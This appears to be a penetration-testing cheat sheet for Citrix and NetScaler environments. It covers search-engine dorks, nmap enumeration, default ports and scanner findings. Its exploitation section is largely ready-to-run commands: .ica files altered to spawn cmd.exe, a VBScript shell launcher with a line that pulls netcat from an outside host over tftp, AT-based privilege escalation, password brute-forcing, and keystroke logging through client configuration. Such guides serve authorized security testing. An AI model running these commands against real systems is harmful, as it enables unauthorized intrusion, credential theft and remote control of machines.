- Citrix
- Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
- Enumeration
- web search
- Google (GHDB)
- Google Hacks (Author Discovered)
- inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
-
- allintitle:Citrix(R) NFuse(TM)
- allintitle:Citrix(r) NFuse(tm) 1.6
- allintitle:Citrix(R) NFuse(TM) Options
- allintitle:Citrix(R) NFuse(TM) Innlogging
- Yahoo
- site search
- Manual
- review web page for useful information
- review source for web page
- generic
- nmap -A -PN -p 80,443,1494 ip_address
- amap -bqv ip_address port_no.
- citrix specific
-
- perl enum.pl ip_address
-
- enum.js apps TCPBrowserAdress=ip_address
-
- connect.js TCPBrowserAdress=ip_address Application=advertised-application
-
- perl pa-scan.pl ip_address [timeout] > pas.wri
-
- ./pabrute pubapp list app_list ip_address
-
- Default Ports
- TCP
- Citrix XML Service
- 80
- Advanced Management Console
- 135
- Citrix SSL Relay
- 443
- ICA sessions
- 1494
- Server to server
- 2512
- Management Console to server
- 2513
- Session Reliability (Auto-reconnect)
- 2598
- Note: - If Port 1494 is open you will not see 2598 open, ICA sessions use either or.
- License Management Console
- 8082
- License server
- 27000
- UDP
- Clients to ICA browser service
- 1604
- Server-to-server
- 1604
-
-
- nmap -sU --script=citrix-enum-apps -p 1604 <host>
-
- nmap --script=citrix-enum-apps-xml -p 80,443 <host>
-
- nmap -sU --script=citrix-enum-servers -p 1604
-
- nmap --script=citrix-enum-servers-xml -p 80,443 <host>
-
- nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
-
- Scanning
-
-
- CGI abuses
- NetScaler web management interface ip address cookie disclosure
- CGI abuses : Cross Site Scripting (XSS)
- Citrix MetaFrame XP login.asp
- Citrix NFuse Launch Scripts
- NetScaler web management XSS
- Misc.
- Citrix Published Applications Remote Enumeration
- NetScaler web management cookie information
- Service Detection
- Citrix Licensing Server detection
- Citrix Server detection
- Web Servers
- Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
- NetScaler web management cookie cipher weakness
- NetScaler web management interface detection
- Unencrypted NetScaler web management interface
- Windows
- Citrix Licensing Server License Management Console
- Citrix Password Manager Agent Secondary Credential Information Disclosurey
- Citrix Password Manager Service Stored Credentials Disclosure
- Citrix Presentation Server Remote Code Execution
- Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service
- Citrix web interface 4.6, 5.0, 5.0.1 XSS
- Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
- NetScaler web management cookie cipher weakness
- NetScaler web management interface detection
- NetScaler web management login
- Unencrypted NetScaler web management interface
-
-
- perl nikto.pl -host ip_address -port port_no.
Note: - It is possible to grep all Citrix/ NFuse/ NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file replacing the local version in nikto\plugins directory should you wish to specifically limit your enumeration to Citrix vulnerabilties. As of 1 Oct 09, there are currently 9 specific tests meeting these requirements.
-
- Exploitation
- Alter default .ica files
- InitialProgram=cmd.exe
- InitialProgram=c:\windows\system32\cmd.exe
- InitialProgram=explorer.exe
- Enumerate and Connect
- For applications identified by Citrix-pa-scan
-
- Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
- Writes output to pas_results.wri
-
- For published applications with a Citrix client when the master browser is non-public.
-
- pa-proxy.pl IP_to_proxy_to (i.e. remote server) 127.0.0.1
-
- Manual Testing
- Create Batch File (cmd.bat)
- 1
- cmd.exe
- 2
- echo off
- command
- echo on
-
- Option Explicit
- Dim objShell
- Set objShell = CreateObject("WScript.Shell")
- objShell.Run "%comspec% /k"
- WScript.Quit
- alternative functionality
- objShell.Run "%comspec% /k c: & dir"
- objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
- objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
-
- Integrated Kiosk Attack Tool
- Reconnaissance
- FileSystem Links
- Common Dialogs
- Application Handlers
- Browser Plugins
- iKAT Tools
- AT Command - priviledge escalation
- AT HH:MM /interactive "cmd.exe"
- AT HH:MM /interactive %comspec% /k
Note: - AT by default runs as system and although enabled for a normal user, will only work with these privileges for an admin, however, still worth a try.
- Keyboard Shortcuts/ Hotkeys
- Ctrl + h – View History
- Ctrl + n – New Browser
- Shift + Left Click – New Browser
- Ctrl + o – Internet Address (browse feature)
- Ctrl + p – Print (to file)
- Right Click (Shift + F10)
- Save Image As
- View Source
- F1 – Jump to URL
- SHIFT+F1: Local Task List
- SHIFT+F2: Toggle Title Bar
- SHIFT+F3: Close Remote Application
- CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
- CTRL+F2: Remote Task List
- CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
- ALT+F2: Cycle through programs
- ALT+PLUS: Alt+TAB
- ALT+MINUS: ALT+SHIFT+TAB
- Brute Force
-
- bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
- bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
bforce.js TCPBrowserAddress=ip-address usernames=user1,user2 passwords=pass1,pass2 timeout=5000
-
- Review Configuration Files
- Application server configuration file
- appsrv.ini
- Location
- <profile path>\Application Data\ICAClient
- /usr/lib/ICAClient/config/appsrv.ini
- $HOME/.ICAClient/appsrv.ini
- Other ...
- World writeable
-
-
- perl scancodes.pl wfcwin32.log
- LogKeyboard=On
- LogAppend=On
-
-
- Review other files
- wfcwin32.log
- <profile path>\Application Data\ICAClient
- Other ...
- Program Neighborhood configuration file
- pn.ini
- Location
- <profile path>\Application Data\ICAClient
- /usr/lib/ICAClient/config/pn.ini
- Other ...
- Review other files
- .idx files
- Mini-database containing published apps available
- .vl files
- The encrypted username, password, and domain name
- Weak Encryption enabled?
-
- Thanks to Paweł Krawczyk
-
- Citrix ICA client configuration file
- wfclient.ini
- Location
- <profile path>\Application Data\ICAClient
- /usr/lib/ICAClient/config/wfclient. ini
- $HOME/.ICAClient/wfclient.ini
- Other ...
- References
- Vulnerabilities
- Common Vulnerabilities and Exploits (CVE)
Vulnerabilties and exploit information relating to these products can be found here:
- OSVDB
- Secunia
- Security-database.com
- Support
- Citrix
- Exploits
- Offensive Security Exploit Database
- Art of Hacking
- Tutorials/ Presentations
- Aditya Sood
- BlackHat
- Carnal0wnage
- Foundstone
- GNUCitizen
- Insomniac Security
- itgeekchronicles
- Packetstormsecurity
- SynJunkie
-
- Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
